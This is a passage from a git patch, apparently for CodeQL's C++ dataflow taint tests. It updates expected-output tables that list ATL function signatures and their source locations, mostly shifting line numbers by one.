-| atl.cpp:762:8:762:10 | Add | (const vector &,const Allocator &) | vector | vector | 1 | -| atl.cpp:762:8:762:10 | Add | (deque &&,const Allocator &) | deque | deque | 1 | -| atl.cpp:762:8:762:10 | Add | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:762:8:762:10 | Add | (list &&,const Allocator &) | list | list | 1 | -| atl.cpp:762:8:762:10 | Add | (vector &&,const 
Allocator &) | vector | vector | 1 | -| atl.cpp:773:8:773:12 | SetAt | (const deque &,const Allocator &) | deque | deque | 1 | -| atl.cpp:773:8:773:12 | SetAt | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:773:8:773:12 | SetAt | (const list &,const Allocator &) | list | list | 1 | -| atl.cpp:773:8:773:12 | SetAt | (const vector &,const Allocator &) | vector | vector | 1 | -| atl.cpp:773:8:773:12 | SetAt | (deque &&,const Allocator &) | deque | deque | 1 | -| atl.cpp:773:8:773:12 | SetAt | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:773:8:773:12 | SetAt | (list &&,const Allocator &) | list | list | 1 | -| atl.cpp:773:8:773:12 | SetAt | (vector &&,const Allocator &) | vector | vector | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | deque | deque | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | forward_list | forward_list | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | list | list | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex 
| (size_type,const T &,const Allocator &) | vector | vector | 2 | -| atl.cpp:839:15:839:26 | SetExtraInfo | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:840:15:840:25 | SetHostName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:841:15:841:25 | SetPassword | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:844:15:844:27 | SetSchemeName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:845:15:845:24 | SetUrlPath | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:846:15:846:25 | SetUserName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:69:3:69:15 | _U_STRINGorID | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:69:3:69:15 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:70:3:70:15 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:257:3:257:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:412:3:412:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:412:3:412:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:413:3:413:10 | CComBSTR | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:413:3:413:10 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:414:3:414:10 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | +| atl.cpp:414:3:414:10 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:419:11:419:16 | Append | (wchar_t) | CComBSTR | Append | 0 | +| atl.cpp:420:11:420:16 | Append | (char) | CComBSTR | Append | 0 | +| atl.cpp:421:11:421:16 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:421:11:421:16 | Append | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:422:11:422:16 | Append | (LPCSTR) | CComBSTR | Append | 0 | +| 
atl.cpp:422:11:422:16 | Append | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:423:11:423:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 0 | +| atl.cpp:423:11:423:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:425:11:425:21 | AppendBytes | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:426:11:426:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:426:11:426:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:426:11:426:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:438:8:438:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:438:8:438:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | +| atl.cpp:438:8:438:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | +| atl.cpp:439:8:439:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:439:8:439:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:448:13:448:22 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:448:13:448:22 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:538:3:538:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:538:3:538:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:538:3:538:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:542:11:542:13 | Add | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:542:11:542:13 | Add | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:542:11:542:13 | Add | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:544:11:544:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 0 | +| atl.cpp:544:11:544:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 1 | +| atl.cpp:763:8:763:10 | Add | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:763:8:763:10 | 
Add | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:763:8:763:10 | Add | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:763:8:763:10 | Add | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:763:8:763:10 | Add | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:763:8:763:10 | Add | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:763:8:763:10 | Add | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:763:8:763:10 | Add | (vector &&,const Allocator &) | vector | vector | 1 | +| atl.cpp:774:8:774:12 | SetAt | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:774:8:774:12 | SetAt | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:774:8:774:12 | SetAt | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:774:8:774:12 | SetAt | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:774:8:774:12 | SetAt | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:774:8:774:12 | SetAt | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:774:8:774:12 | SetAt | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:774:8:774:12 | SetAt | (vector &&,const Allocator &) | vector | vector | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | deque | deque | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | list | list | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque 
| 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 2 | +| atl.cpp:840:15:840:26 | SetExtraInfo | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:841:15:841:25 | SetHostName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:842:15:842:25 | SetPassword | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:845:15:845:27 | SetSchemeName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:846:15:846:24 | SetUrlPath | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:847:15:847:25 | SetUserName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | | constructor_delegation.cpp:10:2:10:8 | MyValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | | constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | | standalone_iterators.cpp:103:27:103:36 | operator+= | (LPCOLESTR,int) | CComBSTR | Append | 1 | 
@@ -518,134 +518,134 @@ getParameterTypeName | arrayassignment.cpp:124:6:124:9 | sink | 0 | int * | | atl.cpp:28:8:28:8 | operator= | 0 | __POSITION && | | atl.cpp:28:8:28:8 | operator= | 0 | const __POSITION & | -| atl.cpp:49:16:49:16 | operator= | 0 | const tagSAFEARRAYBOUND & | -| atl.cpp:49:16:49:16 | operator= | 0 | tagSAFEARRAYBOUND && | -| atl.cpp:54:16:54:16 | operator= | 0 | const tagVARIANT & | -| atl.cpp:54:16:54:16 | operator= | 0 | tagVARIANT && | -| atl.cpp:58:16:58:16 | operator= | 0 | const tagSAFEARRAY & | -| atl.cpp:58:16:58:16 | operator= | 0 | tagSAFEARRAY && | -| atl.cpp:67:8:67:8 | _U_STRINGorID | 0 | _U_STRINGorID && | -| atl.cpp:67:8:67:8 | _U_STRINGorID | 0 | const _U_STRINGorID & | -| atl.cpp:67:8:67:8 | operator= | 0 | _U_STRINGorID && | -| atl.cpp:67:8:67:8 | operator= | 0 | const _U_STRINGorID & | -| atl.cpp:68:3:68:15 | _U_STRINGorID | 0 | UINT | -| atl.cpp:69:3:69:15 | _U_STRINGorID | 0 | LPCTSTR | -| atl.cpp:193:10:193:12 | Add | 0 | INARGTYPclass:0 | -| atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray & | -| atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray & | -| atl.cpp:198:6:198:10 | GetAt | 0 | size_t | -| atl.cpp:202:8:202:20 | InsertArrayAt | 0 | size_t | -| atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray * | -| atl.cpp:203:8:203:15 | InsertAt | 0 | size_t | -| atl.cpp:203:8:203:15 | InsertAt | 1 | INARGTYPclass:0 | -| atl.cpp:203:8:203:15 | InsertAt | 2 | size_t | -| atl.cpp:208:8:208:16 | SetAtGrow | 0 | size_t | -| atl.cpp:208:8:208:16 | SetAtGrow | 1 | INARGTYPclass:0 | -| atl.cpp:210:6:210:15 | operator[] | 0 | size_t | -| atl.cpp:256:3:256:10 | CAtlList | 0 | UINT | -| atl.cpp:259:12:259:18 | AddHead | 0 | INARGTYPclass:0 | -| atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList * | -| atl.cpp:262:12:262:18 | AddTail | 0 | INARGTYPclass:0 | -| atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList * | -| atl.cpp:264:12:264:15 | Find | 0 | INARGTYPclass:0 | -| atl.cpp:264:12:264:15 | Find | 1 | POSITION 
| -| atl.cpp:265:12:265:20 | FindIndex | 0 | size_t | -| atl.cpp:266:6:266:10 | GetAt | 0 | POSITION | -| atl.cpp:279:12:279:22 | InsertAfter | 0 | POSITION | -| atl.cpp:279:12:279:22 | InsertAfter | 1 | INARGTYPclass:0 | -| atl.cpp:280:12:280:23 | InsertBefore | 0 | POSITION | -| atl.cpp:280:12:280:23 | InsertBefore | 1 | INARGTYPclass:0 | -| atl.cpp:290:8:290:12 | SetAt | 0 | POSITION | -| atl.cpp:290:8:290:12 | SetAt | 1 | INARGTYPclass:0 | -| atl.cpp:400:8:400:8 | operator= | 0 | IUnknown && | -| atl.cpp:400:8:400:8 | operator= | 0 | const IUnknown & | -| atl.cpp:402:8:402:8 | operator= | 0 | ISequentialStream && | -| atl.cpp:402:8:402:8 | operator= | 0 | const ISequentialStream & | -| atl.cpp:404:8:404:8 | operator= | 0 | IStream && | -| atl.cpp:404:8:404:8 | operator= | 0 | const IStream & | -| atl.cpp:406:8:406:8 | operator= | 0 | const CComBSTR & | -| atl.cpp:408:3:408:10 | CComBSTR | 0 | const CComBSTR & | -| atl.cpp:409:3:409:10 | CComBSTR | 0 | int | +| atl.cpp:50:16:50:16 | operator= | 0 | const tagSAFEARRAYBOUND & | +| atl.cpp:50:16:50:16 | operator= | 0 | tagSAFEARRAYBOUND && | +| atl.cpp:55:16:55:16 | operator= | 0 | const tagVARIANT & | +| atl.cpp:55:16:55:16 | operator= | 0 | tagVARIANT && | +| atl.cpp:59:16:59:16 | operator= | 0 | const tagSAFEARRAY & | +| atl.cpp:59:16:59:16 | operator= | 0 | tagSAFEARRAY && | +| atl.cpp:68:8:68:8 | _U_STRINGorID | 0 | _U_STRINGorID && | +| atl.cpp:68:8:68:8 | _U_STRINGorID | 0 | const _U_STRINGorID & | +| atl.cpp:68:8:68:8 | operator= | 0 | _U_STRINGorID && | +| atl.cpp:68:8:68:8 | operator= | 0 | const _U_STRINGorID & | +| atl.cpp:69:3:69:15 | _U_STRINGorID | 0 | UINT | +| atl.cpp:70:3:70:15 | _U_STRINGorID | 0 | LPCTSTR | +| atl.cpp:194:10:194:12 | Add | 0 | INARGTYPclass:0 | +| atl.cpp:196:10:196:15 | Append | 0 | const CAtlArray & | +| atl.cpp:197:8:197:11 | Copy | 0 | const CAtlArray & | +| atl.cpp:199:6:199:10 | GetAt | 0 | size_t | +| atl.cpp:203:8:203:20 | InsertArrayAt | 0 | size_t | +| 
atl.cpp:203:8:203:20 | InsertArrayAt | 1 | const CAtlArray * | +| atl.cpp:204:8:204:15 | InsertAt | 0 | size_t | +| atl.cpp:204:8:204:15 | InsertAt | 1 | INARGTYPclass:0 | +| atl.cpp:204:8:204:15 | InsertAt | 2 | size_t | +| atl.cpp:209:8:209:16 | SetAtGrow | 0 | size_t | +| atl.cpp:209:8:209:16 | SetAtGrow | 1 | INARGTYPclass:0 | +| atl.cpp:211:6:211:15 | operator[] | 0 | size_t | +| atl.cpp:257:3:257:10 | CAtlList | 0 | UINT | +| atl.cpp:260:12:260:18 | AddHead | 0 | INARGTYPclass:0 | +| atl.cpp:261:8:261:18 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:263:12:263:18 | AddTail | 0 | INARGTYPclass:0 | +| atl.cpp:264:8:264:18 | AddTailList | 0 | const CAtlList * | +| atl.cpp:265:12:265:15 | Find | 0 | INARGTYPclass:0 | +| atl.cpp:265:12:265:15 | Find | 1 | POSITION | +| atl.cpp:266:12:266:20 | FindIndex | 0 | size_t | +| atl.cpp:267:6:267:10 | GetAt | 0 | POSITION | +| atl.cpp:280:12:280:22 | InsertAfter | 0 | POSITION | +| atl.cpp:280:12:280:22 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:281:12:281:23 | InsertBefore | 0 | POSITION | +| atl.cpp:281:12:281:23 | InsertBefore | 1 | INARGTYPclass:0 | +| atl.cpp:291:8:291:12 | SetAt | 0 | POSITION | +| atl.cpp:291:8:291:12 | SetAt | 1 | INARGTYPclass:0 | +| atl.cpp:401:8:401:8 | operator= | 0 | IUnknown && | +| atl.cpp:401:8:401:8 | operator= | 0 | const IUnknown & | +| atl.cpp:403:8:403:8 | operator= | 0 | ISequentialStream && | +| atl.cpp:403:8:403:8 | operator= | 0 | const ISequentialStream & | +| atl.cpp:405:8:405:8 | operator= | 0 | IStream && | +| atl.cpp:405:8:405:8 | operator= | 0 | const IStream & | +| atl.cpp:407:8:407:8 | operator= | 0 | const CComBSTR & | +| atl.cpp:409:3:409:10 | CComBSTR | 0 | const CComBSTR & | | atl.cpp:410:3:410:10 | CComBSTR | 0 | int | -| atl.cpp:410:3:410:10 | CComBSTR | 1 | LPCOLESTR | | atl.cpp:411:3:411:10 | CComBSTR | 0 | int | -| atl.cpp:411:3:411:10 | CComBSTR | 1 | LPCSTR | -| atl.cpp:412:3:412:10 | CComBSTR | 0 | LPCOLESTR | -| atl.cpp:413:3:413:10 | CComBSTR | 0 | 
LPCSTR | -| atl.cpp:414:3:414:10 | CComBSTR | 0 | CComBSTR && | -| atl.cpp:417:11:417:16 | Append | 0 | const CComBSTR & | -| atl.cpp:418:11:418:16 | Append | 0 | wchar_t | -| atl.cpp:419:11:419:16 | Append | 0 | char | -| atl.cpp:420:11:420:16 | Append | 0 | LPCOLESTR | -| atl.cpp:421:11:421:16 | Append | 0 | LPCSTR | -| atl.cpp:422:11:422:16 | Append | 0 | LPCOLESTR | -| atl.cpp:422:11:422:16 | Append | 1 | int | -| atl.cpp:423:11:423:20 | AppendBSTR | 0 | BSTR | -| atl.cpp:424:11:424:21 | AppendBytes | 0 | const char * | -| atl.cpp:424:11:424:21 | AppendBytes | 1 | int | -| atl.cpp:425:11:425:21 | ArrayToBSTR | 0 | const SAFEARRAY * | -| atl.cpp:426:11:426:20 | AssignBSTR | 0 | const BSTR | -| atl.cpp:427:8:427:13 | Attach | 0 | BSTR | -| atl.cpp:428:11:428:21 | BSTRToArray | 0 | LPSAFEARRAY | -| atl.cpp:431:11:431:16 | CopyTo | 0 | BSTR * | -| atl.cpp:433:11:433:16 | CopyTo | 0 | VARIANT * | -| atl.cpp:437:8:437:17 | LoadString | 0 | HINSTANCE | -| atl.cpp:437:8:437:17 | LoadString | 1 | UINT | -| atl.cpp:438:8:438:17 | LoadString | 0 | UINT | -| atl.cpp:439:11:439:24 | ReadFromStream | 0 | IStream * | -| atl.cpp:441:11:441:23 | WriteToStream | 0 | IStream * | -| atl.cpp:446:13:446:22 | operator+= | 0 | const CComBSTR & | -| atl.cpp:447:13:447:22 | operator+= | 0 | LPCOLESTR | -| atl.cpp:537:3:537:15 | CComSafeArray | 0 | const SAFEARRAY * | -| atl.cpp:541:11:541:13 | Add | 0 | const SAFEARRAY * | -| atl.cpp:543:11:543:13 | Add | 0 | const class:0 & | -| atl.cpp:543:11:543:13 | Add | 1 | BOOL | -| atl.cpp:551:6:551:10 | GetAt | 0 | LONG | -| atl.cpp:562:11:562:15 | SetAt | 0 | LONG | -| atl.cpp:562:11:562:15 | SetAt | 1 | const class:0 & | -| atl.cpp:562:11:562:15 | SetAt | 2 | BOOL | -| atl.cpp:564:6:564:15 | operator[] | 0 | long | -| atl.cpp:565:6:565:15 | operator[] | 0 | int | -| atl.cpp:609:3:609:8 | CPathT | 0 | PCXSTR | -| atl.cpp:610:3:610:8 | CPathT | 0 | const CPathT & | -| atl.cpp:614:8:614:19 | AddExtension | 0 | PCXSTR | -| atl.cpp:615:8:615:13 | 
Append | 0 | PCXSTR | -| atl.cpp:618:8:618:14 | Combine | 0 | PCXSTR | -| atl.cpp:618:8:618:14 | Combine | 1 | PCXSTR | -| atl.cpp:619:22:619:33 | CommonPrefix | 0 | PCXSTR | -| atl.cpp:656:23:656:32 | operator+= | 0 | PCXSTR | -| atl.cpp:716:8:716:10 | Add | 0 | const class:0 & | -| atl.cpp:717:7:717:10 | Find | 0 | const class:0 & | -| atl.cpp:728:6:728:15 | operator[] | 0 | int | -| atl.cpp:729:21:729:29 | operator= | 0 | const CSimpleArray & | -| atl.cpp:762:8:762:10 | Add | 0 | const class:0 & | -| atl.cpp:762:8:762:10 | Add | 1 | const class:1 & | -| atl.cpp:763:7:763:13 | FindKey | 0 | const class:0 & | -| atl.cpp:764:7:764:13 | FindVal | 0 | const class:1 & | -| atl.cpp:767:9:767:18 | GetValueAt | 0 | int | -| atl.cpp:768:8:768:13 | Lookup | 0 | const class:0 & | -| atl.cpp:772:8:772:20 | ReverseLookup | 0 | const class:1 & | -| atl.cpp:773:8:773:12 | SetAt | 0 | const class:0 & | -| atl.cpp:773:8:773:12 | SetAt | 1 | const class:1 & | -| atl.cpp:774:8:774:17 | SetAtIndex | 0 | int | -| atl.cpp:774:8:774:17 | SetAtIndex | 1 | const class:0 & | -| atl.cpp:774:8:774:17 | SetAtIndex | 2 | const class:1 & | -| atl.cpp:813:9:813:17 | operator= | 0 | const CUrl & | -| atl.cpp:815:3:815:6 | CUrl | 0 | const CUrl & | -| atl.cpp:818:15:818:26 | Canonicalize | 0 | DWORD | -| atl.cpp:821:8:821:15 | CrackUrl | 0 | LPCTSTR | -| atl.cpp:821:8:821:15 | CrackUrl | 1 | DWORD | -| atl.cpp:822:15:822:23 | CreateUrl | 0 | LPTSTR | -| atl.cpp:822:15:822:23 | CreateUrl | 1 | DWORD * | -| atl.cpp:822:15:822:23 | CreateUrl | 2 | DWORD | -| atl.cpp:839:15:839:26 | SetExtraInfo | 0 | LPCTSTR | -| atl.cpp:840:15:840:25 | SetHostName | 0 | LPCTSTR | -| atl.cpp:841:15:841:25 | SetPassword | 0 | LPCTSTR | -| atl.cpp:842:15:842:27 | SetPortNumber | 0 | ATL_URL_PORT | -| atl.cpp:843:15:843:23 | SetScheme | 0 | ATL_URL_SCHEME | -| atl.cpp:844:15:844:27 | SetSchemeName | 0 | LPCTSTR | -| atl.cpp:845:15:845:24 | SetUrlPath | 0 | LPCTSTR | -| atl.cpp:846:15:846:25 | SetUserName | 0 | LPCTSTR 
| +| atl.cpp:411:3:411:10 | CComBSTR | 1 | LPCOLESTR | +| atl.cpp:412:3:412:10 | CComBSTR | 0 | int | +| atl.cpp:412:3:412:10 | CComBSTR | 1 | LPCSTR | +| atl.cpp:413:3:413:10 | CComBSTR | 0 | LPCOLESTR | +| atl.cpp:414:3:414:10 | CComBSTR | 0 | LPCSTR | +| atl.cpp:415:3:415:10 | CComBSTR | 0 | CComBSTR && | +| atl.cpp:418:11:418:16 | Append | 0 | const CComBSTR & | +| atl.cpp:419:11:419:16 | Append | 0 | wchar_t | +| atl.cpp:420:11:420:16 | Append | 0 | char | +| atl.cpp:421:11:421:16 | Append | 0 | LPCOLESTR | +| atl.cpp:422:11:422:16 | Append | 0 | LPCSTR | +| atl.cpp:423:11:423:16 | Append | 0 | LPCOLESTR | +| atl.cpp:423:11:423:16 | Append | 1 | int | +| atl.cpp:424:11:424:20 | AppendBSTR | 0 | BSTR | +| atl.cpp:425:11:425:21 | AppendBytes | 0 | const char * | +| atl.cpp:425:11:425:21 | AppendBytes | 1 | int | +| atl.cpp:426:11:426:21 | ArrayToBSTR | 0 | const SAFEARRAY * | +| atl.cpp:427:11:427:20 | AssignBSTR | 0 | const BSTR | +| atl.cpp:428:8:428:13 | Attach | 0 | BSTR | +| atl.cpp:429:11:429:21 | BSTRToArray | 0 | LPSAFEARRAY | +| atl.cpp:432:11:432:16 | CopyTo | 0 | BSTR * | +| atl.cpp:434:11:434:16 | CopyTo | 0 | VARIANT * | +| atl.cpp:438:8:438:17 | LoadString | 0 | HINSTANCE | +| atl.cpp:438:8:438:17 | LoadString | 1 | UINT | +| atl.cpp:439:8:439:17 | LoadString | 0 | UINT | +| atl.cpp:440:11:440:24 | ReadFromStream | 0 | IStream * | +| atl.cpp:442:11:442:23 | WriteToStream | 0 | IStream * | +| atl.cpp:447:13:447:22 | operator+= | 0 | const CComBSTR & | +| atl.cpp:448:13:448:22 | operator+= | 0 | LPCOLESTR | +| atl.cpp:538:3:538:15 | CComSafeArray | 0 | const SAFEARRAY * | +| atl.cpp:542:11:542:13 | Add | 0 | const SAFEARRAY * | +| atl.cpp:544:11:544:13 | Add | 0 | const class:0 & | +| atl.cpp:544:11:544:13 | Add | 1 | BOOL | +| atl.cpp:552:6:552:10 | GetAt | 0 | LONG | +| atl.cpp:563:11:563:15 | SetAt | 0 | LONG | +| atl.cpp:563:11:563:15 | SetAt | 1 | const class:0 & | +| atl.cpp:563:11:563:15 | SetAt | 2 | BOOL | +| atl.cpp:565:6:565:15 | 
operator[] | 0 | long | +| atl.cpp:566:6:566:15 | operator[] | 0 | int | +| atl.cpp:610:3:610:8 | CPathT | 0 | PCXSTR | +| atl.cpp:611:3:611:8 | CPathT | 0 | const CPathT & | +| atl.cpp:615:8:615:19 | AddExtension | 0 | PCXSTR | +| atl.cpp:616:8:616:13 | Append | 0 | PCXSTR | +| atl.cpp:619:8:619:14 | Combine | 0 | PCXSTR | +| atl.cpp:619:8:619:14 | Combine | 1 | PCXSTR | +| atl.cpp:620:22:620:33 | CommonPrefix | 0 | PCXSTR | +| atl.cpp:657:23:657:32 | operator+= | 0 | PCXSTR | +| atl.cpp:717:8:717:10 | Add | 0 | const class:0 & | +| atl.cpp:718:7:718:10 | Find | 0 | const class:0 & | +| atl.cpp:729:6:729:15 | operator[] | 0 | int | +| atl.cpp:730:21:730:29 | operator= | 0 | const CSimpleArray & | +| atl.cpp:763:8:763:10 | Add | 0 | const class:0 & | +| atl.cpp:763:8:763:10 | Add | 1 | const class:1 & | +| atl.cpp:764:7:764:13 | FindKey | 0 | const class:0 & | +| atl.cpp:765:7:765:13 | FindVal | 0 | const class:1 & | +| atl.cpp:768:9:768:18 | GetValueAt | 0 | int | +| atl.cpp:769:8:769:13 | Lookup | 0 | const class:0 & | +| atl.cpp:773:8:773:20 | ReverseLookup | 0 | const class:1 & | +| atl.cpp:774:8:774:12 | SetAt | 0 | const class:0 & | +| atl.cpp:774:8:774:12 | SetAt | 1 | const class:1 & | +| atl.cpp:775:8:775:17 | SetAtIndex | 0 | int | +| atl.cpp:775:8:775:17 | SetAtIndex | 1 | const class:0 & | +| atl.cpp:775:8:775:17 | SetAtIndex | 2 | const class:1 & | +| atl.cpp:814:9:814:17 | operator= | 0 | const CUrl & | +| atl.cpp:816:3:816:6 | CUrl | 0 | const CUrl & | +| atl.cpp:819:15:819:26 | Canonicalize | 0 | DWORD | +| atl.cpp:822:8:822:15 | CrackUrl | 0 | LPCTSTR | +| atl.cpp:822:8:822:15 | CrackUrl | 1 | DWORD | +| atl.cpp:823:15:823:23 | CreateUrl | 0 | LPTSTR | +| atl.cpp:823:15:823:23 | CreateUrl | 1 | DWORD * | +| atl.cpp:823:15:823:23 | CreateUrl | 2 | DWORD | +| atl.cpp:840:15:840:26 | SetExtraInfo | 0 | LPCTSTR | +| atl.cpp:841:15:841:25 | SetHostName | 0 | LPCTSTR | +| atl.cpp:842:15:842:25 | SetPassword | 0 | LPCTSTR | +| atl.cpp:843:15:843:27 | 
SetPortNumber | 0 | ATL_URL_PORT | +| atl.cpp:844:15:844:23 | SetScheme | 0 | ATL_URL_SCHEME | +| atl.cpp:845:15:845:27 | SetSchemeName | 0 | LPCTSTR | +| atl.cpp:846:15:846:24 | SetUrlPath | 0 | LPCTSTR | +| atl.cpp:847:15:847:25 | SetUserName | 0 | LPCTSTR | | bsd.cpp:6:8:6:8 | operator= | 0 | const sockaddr & | | bsd.cpp:6:8:6:8 | operator= | 0 | sockaddr && | | bsd.cpp:12:5:12:10 | accept | 0 | int | From 3abb9049bb1fb9d3aa8031b42c4621ad0de7224e Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 19:06:20 +0000 Subject: [PATCH 0784/1267] C++: Fix testcase to reveal problematic models. --- .../library-tests/dataflow/taint-tests/atl.cpp | 4 ++-- .../dataflow/taint-tests/localTaint.expected | 16 ++++------------ 2 files changed, 6 insertions(+), 14 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 